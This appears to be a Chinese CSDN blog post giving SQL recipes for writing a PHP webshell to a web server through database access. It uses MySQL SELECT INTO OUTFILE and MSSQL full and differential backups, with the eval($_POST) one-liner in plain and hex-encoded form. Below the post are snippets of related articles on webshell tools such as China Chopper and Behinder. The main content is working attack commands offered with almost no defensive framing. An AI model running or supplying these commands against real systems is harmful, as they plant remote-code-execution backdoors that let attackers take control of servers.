数据库WebShell连接

最新推荐文章于 2024-09-15 08:03:51 发布
最新推荐文章于 2024-09-15 08:03:51 发布
阅读量404 收藏
点赞数 7
文章标签: 数据库 网络安全 安全 系统安全 web安全 安全威胁分析 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57379923/article/details/140896245
版权

MySQL

MySQL 的 webshell 连接,具体参考(MySQL 靶场 & 攻击

use TEST;
show tables;
create table muma(cmd text);
insert into muma values(concat('<?php @eval($_POST[','''','mimi','''',']); ?>'));
select * from muma;
select * from muma into outfile '/var/www/html/ma.php';
use TEST;
show tables;
create table muma(cmd text);
insert into muma values(concat('<?php @eval($_POST[','''','mimi','''',']); ?>'));
select * from muma;
select * from muma into outfile '/var/www/html/ma.php';

   

MSSQL

完全备份

CREATE DATABASE tt;
USE tt;
CREATE TABLE cmd(a VARCHAR(200));
INSERT INTO cmd VALUES('<?php @eval($_POST['+'"'+'passwd'+'"'+']); ?>');
BACKUP DATABASE tt TO DISK = 'C:\temp\tt.bak' WITH init;
BACKUP LOG tt to DISK='C:\phpstudy_pro\WWW\tt.php';

   

CREATE DATABASE tt;
USE tt;
CREATE TABLE cmd(x image);
INSERT INTO cmd VALUES(0x3c3f70687020406576616c28245f504f53545b22706173737764225d293b3f3e);
BACKUP DATABASE ttt TO DISK = 'C:\temp\ttt.bak' WITH init;
BACKUP LOG tt to DISK='C:\phpstudy_pro\WWW\ttt.php';

   

差异备份

CREATE DATABASE tt;
USE tt;
BACKUP DATABASE tt TO DISK = 'C:\temp\tt.bak' WITH init;
CREATE TABLE cmd(a VARCHAR(200));
INSERT INTO cmd VALUES('<?php @eval($_POST['+'"'+'passwd'+'"'+']); ?>');
BACKUP DATABASE tt TO DISK = 'C:\phpstudy_pro\WWW\tt.php' WITH DIFFERENTIAL;

   

CREATE DATABASE ttt;
USE ttt;
BACKUP DATABASE ttt TO DISK = 'C:\temp\ttt.bak' WITH init;
CREATE TABLE cmd(x image);
INSERT INTO cmd VALUES(0x3c3f70687020406576616c28245f504f53545b22706173737764225d293b3f3e);
BACKUP DATABASE ttt TO DISK = 'C:\phpstudy_pro\WWW\ttt.php' WITH DIFFERENTIAL;

作 者:PeiyuJue
链 接: 数据库WebShell连接 – Candid Chronicles
来 源:Aaron的博客
版 权 声 明:本博客所有文章除特别声明外,均采用CC BY-NC-SA 4.0许可协议。文章版权归作者所有,未经允许请勿转载! 

Aaron_Jㅤ
关注
WebShell连接工具(中国菜刀、WeBaCoo、Weevely)使用
悦分享
07-31 3410
第三步此时会弹出一个添加shell的对话框,由图一看出我的“dxr.php”上传在站点根目录,所以这里的地址填为http//localhost/dxr.php。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。最后点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈...大功告成!...
MySQL数据库写入webshell
weixin_45253622的博客
03-24 935
MySQL数据库写入webshell 判断 前提条件: 数据库当前用户为root权限 知道当前网站的绝对路径 PHP的GPC为OFF状态 写入的那个路径存在写入权限 注意点: secure_file_priv参数 这个参数用来限制数据导入和导出操作的效果,例如执行LOAD DATA、SELECT … INTO OUTFILE语句和LOAD_FILE()函数。 如果这个参数为空,这个变量没有效果。 如果这个参数设为一个目录名,MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在,M
shell连接dsn类型的数据库
weixin_30881367的博客
05-20 83
对于windows系统,经常碰到使用dsn的mdb/accsss,sql server 2000/2005数据库连接,主要是ip地址不知道, 通过搜索,可以使用以下方法来找到: 网上也有人给了命令,自己看: reg export HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBC.INI c:\1.txt reg export HKEY_CURRENT_...
linux脚本读取mssql数据库,WebShell通过SQL语句管理MSSQL
weixin_29271053的博客
05-08 229
最近在做一个网络安全相关项目的***测试,在拿到了服务器的webshell之后,需要进一步***,服务器上有较高权限的软件只剩SQL Server 2005了,而且在webshell中通过SQL Server 2005提权拿到系统权限,由于拿到webshell的服务器在内网,通过防火墙做了端口映射,无法直接使用SQL Server管理工具进行管理,就需要通过webshell执行SQL 语句来操作S...
文件上传之Webshell连接方法
saber的博客
04-19 6368
Webshell就是以asp.php.jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称为一种网页木马后门,攻击者可以通过这种网页后门获得网站服务器操作权限,控制网站服务器以进行上传下载文件, 查看数据库执行命令 通过服务器开放的端口获取服务器的某些权限。往目标网站中上传一句话木马,然后你就可以在本地通过Shell管理工具连接即可获取和控制整个网站目录。
linux mysql webshell_通过MySQL写入webshell的几种方式
weixin_39785723的博客
01-28 372
在实际写webshell的时候,我们经常会遭受到secure_file_priv的阻拦,secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用,其参数值有以下三种:1、NULL:表示不允许导入导出3、空,即没有具体值:表示不对导入导出做限制可使用如下命令来查看secure_file_priv的值:show global variable...
sqlmap常用渗透方法
weixin_30721899的博客
09-05 609
0X001 适用场景 1.获取了Mysql数据库root账号以及密码。 2.可以访问3306端口以及数据库。 0X002 扫描获取root账号的密码 通常有下面一些方法来获取root账号的密码 (1)phpMyAdmin多线程批量破解工具,下载地址:http://www.test404.com/post-546.html http://pan.baidu.com/s/1c1LD6...
负载均衡下Webshell连接思路及难点
热门推荐
钟言的博客
01-29 1万+
本篇为讲解负载均衡下的webshell连接思路及难点,详细内容包含了应用场景 环境搭建 思路以及难点 1、查看内部结构 2、查看webshell 3、使用蚁剑进行连接 4、难点1 shell文件上传问题 5、难点2 命令执行时飘逸 6、难点3 大工具上传失败 7、难点4 脚本失效 四、解决方式 1、关闭对方节点服务器 2、基于IP地址判断是否执行 3、脚本实现流量转发 3.1 创建antproxy.jsp脚本 3.2 修改 Shell 配置等等内容
数据库备份拿webshell
weixin_41657031的博客
01-13 1349
数据库备份拿webshell 原理 ​ 数据库备份拿webshell主要前提是能进入到应用系统后台,并且有数据库备份功能。 ​ 当我们想法设法进入到一个系统后台之后,本以为找一个文件上传的地方来上传一个webshell,但是上传点却是限制得死死的,高强度的白名单限制,各种绕过都没有成功,恰巧该系统后台中有数据库备份这个功能,此时我们可以通过数据库备份来拿webshell! ​ 首...
数据库连接利用工具–Sylas
02-23
标题“数据库连接利用工具–Sylas”揭示了一个专门用于数据库连接和操作的工具,名为Sylas。这个工具可能具有高级的功能,允许用户执行特定的系统命令,如`tasklist /svc`和`net user`,这些都是Windows操作系统下的...
webshell连接工具skyscorpionV1.0.beta39.20210126.zip
04-27
Webshell连接工具Skyscorpion V1.0.beta39.20210126.zip是一款专门针对Web安全领域的实用工具,主要用于管理和控制已植入的WebshellWebshell通常是在网站服务器上通过SQL注入、文件上传漏洞等攻击手段留下的后门,...
webshell连接工具冰蝎2.0,后面有三点零的,找一找再发
12-28
【标题】中的“webshell连接工具冰蝎2.0”指的是一个用于远程管理Web服务器的后门工具,通常被安全研究人员或渗透测试人员用来模拟黑客攻击行为,以检测和修复系统漏洞。冰蝎是一个功能强大的Web后门客户端,它允许...
4.网络编程
weixin_45476535的博客
09-14 453
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
【学习笔记】手写 Tomcat 三
LearnTech_123的博客
09-12 1105
响应动态资源不需要写文件名了,只需要写功能的名称即可。比如登录功能,可以定义名称为 doLogin
55 mysql 的登录认证流程
最新发布
970655147的专栏
09-15 811
这里我们来看一下 mysql 的认证的流程我们这里仅仅看 我们最常见的一个 认证的处理流程我们经常会登录的时候 碰到各种异常信息大概的流程是这样客户端和服务器建立连接之后, 服务器向客户端发送 salt然后 客户端根据 salt 将客户端传入的密码加密之后, 以及相关登录信息传递给服务器然后 服务器进行验证, 验证失败, 响应对应的错误信息给客户端服务器发送 salt 的信息如下客户端发送的认证请求如下服务器响应的认证失败信息如下。
110个oracle常用函数总结
m516387177的博客
09-12 823
nvl2 (expr1, expr2, expr3) ->expr1不为null,返回expr2;为null,返回expr3。nvl(expr1, expr2)->expr1为null,返回expr2;不为null,返回expr1。求最大值,all表示对所有的值求最大值,distinct表示对不同的值求最大值,相同的只取一次。求最小值,all表示对所有的值求最小值,distinct表示对不同的值求最小值,相同的只取一次。nullif (expr1, expr2) ->相等返回null,不等返回expr1。
PHP在现代Web开发中的高效应用与最佳实践
运维人生
09-13 1021
我们将使用Laravel框架来构建一个简单的博客系统,该系统包括文章发布、编辑、查看和评论等功能。PHP作为一门成熟且强大的服务器端脚本语言,在现代Web开发中依然扮演着重要角色。通过遵循最佳实践、利用现代PHP版本的特性和成熟的框架与组件,开发者可以高效构建出稳定、安全、可扩展的Web应用。本文通过一个简单的博客系统案例,展示了PHP在实际项目中的应用方法和技巧,希望能为PHP开发者提供一些有益的参考和启发。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Aaron_Jㅤ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值